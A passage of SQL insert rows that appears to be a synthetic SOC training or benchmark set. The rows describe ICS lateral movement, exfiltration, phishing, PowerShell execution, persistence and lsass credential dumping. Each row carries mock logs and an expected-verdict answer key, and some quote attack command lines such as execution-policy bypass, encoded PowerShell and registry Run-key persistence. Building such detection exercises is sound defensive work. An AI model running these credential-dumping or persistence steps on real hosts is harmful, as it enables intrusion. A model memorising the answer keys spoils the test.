(1079, 'Lateral Movement via Exploited ICS Protocols', 'high', 'Network Traffic Analysis', 'An advanced threat actor is exploiting known vulnerabilities in ICS communication protocols to move laterally within the network. The attacker aims to control interconnected systems and expand their reach.', 'Lateral Movement', 'T0889', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"protocol\":\"Modbus\",\"action\":\"Exploit Attempt\",\"username\":\"ics_operator\",\"filename\":\"exploit_modbus.exe\",\"file_hash\":\"3d2e479f0e3f4a21a1c8c3b4b5a6e7e9\",\"event_id\":\"evt-48923\",\"message\":\"Detected lateral movement attempt using Modbus protocol exploit from source IP 203.0.113.45 targeting 192.168.1.15\",\"severity\":\"critical\"}', '2026-01-24 03:36:35', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"ICS component within the network\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"exploit_modbus.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File used in lateral movement exploits\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3d2e479f0e3f4a21a1c8c3b4b5a6e7e9\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware exploiting ICS protocols\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1080, 'Data Exfiltration via Encrypted Channels', 'critical', 'Data Loss Prevention (DLP)', 'In the final stage of their operation, attackers exfiltrate valuable ICS configuration and operational data using encrypted channels. The data is intended for future intelligence and potential sabotage.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-10T14:23:35Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"encrypted\":true,\"file_hash\":\"8e9b4d9c5b6f8c7a8f0e4b5d6c7a8f9e\",\"filename\":\"ICS_config_data.zip\",\"user\":\"jdoe\",\"external_ip\":\"203.0.113.45\"}', '2026-01-24 03:36:35', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with APT activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"8e9b4d9c5b6f8c7a8f0e4b5d6c7a8f9e\",\"is_critical\":true,\"osint_result\":{\"source\":\"vendor\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with exfiltrated sensitive ICS data.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ICS_config_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests sensitive ICS data exfiltration.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Username of compromised account used in data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encrypted\\\":true,\\\"file_hash\\\":\\\"8e9b4d9c5b6f8c7a8f0e4b5d6c7a8f9e\\\",\\\"filename\\\":\\\"ICS_config_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encrypted\\\":true,\\\"file_hash\\\":\\\"8e9b4d9c5b6f8c7a8f0e4b5d6c7a8f9e\\\",\\\"filename\\\":\\\"ICS_config_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encrypted\\\":true,\\\"file_hash\\\":\\\"8e9b4d9c5b6f8c7a8f0e4b5d6c7a8f9e\\\",\\\"filename\\\":\\\"ICS_config_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encrypted\\\":true,\\\"file_hash\\\":\\\"8e9b4d9c5b6f8c7a8f0e4b5d6c7a8f9e\\\",\\\"filename\\\":\\\"ICS_config_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encrypted\\\":true,\\\"file_hash\\\":\\\"8e9b4d9c5b6f8c7a8f0e4b5d6c7a8f9e\\\",\\\"filename\\\":\\\"ICS_config_data.zip\\\",\\\"user\\\":\\\"jdoe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1081, 'Spear-Phishing Email with Malicious Attachment', 'high', 'Email Gateway Logs', 'An expertly crafted spear-phishing email was detected targeting key personnel. The email contained a malicious attachment designed to deploy the Careto malware, aiming to compromise user credentials and establish a foothold.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:26:35Z\",\"email_id\":\"b4f3c2d5-163e-4d8c-a5b0-2a5b0f2d7c43\",\"sender\":\"phisher@example.com\",\"recipient\":\"john.doe@company.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":{\"filename\":\"Invoice_2023.pdf\",\"hash\":\"a6f5d7b8c9d10e11f13b14a15c16d17e\",\"type\":\"application/pdf\"},\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.10.15\",\"malware_detected\":\"Careto\",\"analysis\":{\"verdict\":\"malicious\",\"description\":\"The attachment contains macros that deploy Careto malware.\"}}', '2026-01-24 03:40:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing email address associated with multiple campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address involved in previous phishing attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a6f5d7b8c9d10e11f13b14a15c16d17e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known variant of Careto malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_2023.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear-Phishing Email with Malicious Attachment\",\"date\":\"2026-02-01T20:32:22.788Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1082, 'Execution of Malicious Script', 'high', 'Endpoint Detection and Response (EDR) Systems', 'A malicious script was executed on the host system, facilitating the deployment of the Careto malware. This operation aims to gain control and extract sensitive information from the compromised machine.', 'Execution', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:23:45Z\",\"event_id\":4624,\"log_source\":\"EDR\",\"host\":\"COMPROMISED-HOST\",\"user\":\"john.doe\",\"internal_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.45\",\"file_name\":\"careto_deploy.ps1\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"process\":{\"name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\john.doe\\\\careto_deploy.ps1\"}}', '2026-01-24 03:40:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised machine.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public IP\",\"verdict\":\"malicious\",\"details\":\"External IP address associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of the Careto malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"careto_deploy.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Filename used to deploy Careto malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"User account related to the execution of the script.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1083, 'Establishment of Persistence Mechanisms', 'high', 'Windows Registry and Scheduled Tasks Logs', 'The malware modifies registry keys and creates scheduled tasks to maintain persistence on the compromised networks. This activity indicates an attempt to ensure long-term access to the compromised systems by altering critical system configurations.', 'Persistence', 'T1547', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:33Z\",\"event_id\":7045,\"event_source\":\"Microsoft-Windows-TaskScheduler\",\"computer_name\":\"compromised-host.local\",\"user\":\"SYSTEM\",\"task_name\":\"\\\\ScheduledTask\\\\MaliciousTask\",\"task_content\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c C:\\\\malware\\\\persistence.exe\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Persistence\",\"registry_value\":\"C:\\\\malware\\\\persistence.exe\",\"internal_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.45\",\"hash\":\"3b6e6e0d9b8c3c2a6f7e6b8b9d8c3f7e\",\"username\":\"admin\"}', '2026-01-24 03:40:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3b6e6e0d9b8c3c2a6f7e6b8b9d8c3f7e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known persistence malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.791Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\ScheduledTask\\\\\\\\MaliciousTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Persistence\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"3b6e6e0d9b8c3c2a6f7e6b8b9d8c3f7e\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.791Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\ScheduledTask\\\\\\\\MaliciousTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Persistence\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"3b6e6e0d9b8c3c2a6f7e6b8b9d8c3f7e\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.791Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\ScheduledTask\\\\\\\\MaliciousTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Persistence\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"3b6e6e0d9b8c3c2a6f7e6b8b9d8c3f7e\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.791Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\ScheduledTask\\\\\\\\MaliciousTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Persistence\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"3b6e6e0d9b8c3c2a6f7e6b8b9d8c3f7e\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.791Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:33Z\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Microsoft-Windows-TaskScheduler\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"task_name\\\":\\\"\\\\\\\\ScheduledTask\\\\\\\\MaliciousTask\\\",\\\"task_content\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Persistence\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\persistence.exe\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"3b6e6e0d9b8c3c2a6f7e6b8b9d8c3f7e\\\",\\\"username\\\":\\\"admin\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1084, 'Credential Dumping for Lateral Movement', 'high', 'Network Traffic Analysis and SIEM', 'Using stolen credentials, the threat actors move laterally across the network, targeting critical systems and expanding their reach. The attacker accessed sensitive systems using harvested credentials.', 'Lateral Movement', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:32:17Z\",\"event_id\":\"10002\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.10.5.23\",\"event_type\":\"credential_access\",\"username\":\"jdoe_admin\",\"file_accessed\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_name\":\"procdump.exe\",\"action\":\"credential_dump\",\"network_protocol\":\"SMB\",\"destination_port\":445}', '2026-01-24 03:40:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known APT actor IP.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"Unusual access pattern detected.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping tools.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"procdump.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Potential misuse of legitimate tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1085, 'Data Exfiltration via Encrypted Channels', 'critical', 'Data Loss Prevention (DLP) Systems', 'The Mask uses encrypted channels to exfiltrate sensitive data from targeted organizations, aiming to avoid detection and complete their espionage mission.', 'Exfiltration', 'T1048.003', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-04T13:45:32Z\",\"event_id\":\"EXFIL-2023-3421\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.15\",\"protocol\":\"HTTPS\",\"filename\":\"confidential_report.pdf\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user\":\"jdoe\",\"action\":\"File Transfer\",\"detection_module\":\"EncryptedChannelMonitor\",\"alert\":\"Suspicious exfiltration detected via encrypted channel\",\"extra_info\":{\"encryption_type\":\"TLS 1.3\",\"data_volume\":\"5MB\",\"destination_domain\":\"malicious-actor.xyz\"}}', '2026-01-24 03:40:42', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP is from an internal network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Monitoring\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash is not associated with known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP System\",\"verdict\":\"sensitive\",\"details\":\"File contains sensitive information.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Employee account used in data exfiltration.\"}},{\"id\":\"artifact_6\",\"type\":\"domain\",\"value\":\"malicious-actor.xyz\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Domain is associated with known threat actors.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'DLP', 1, 0, NULL, NULL, NULL, 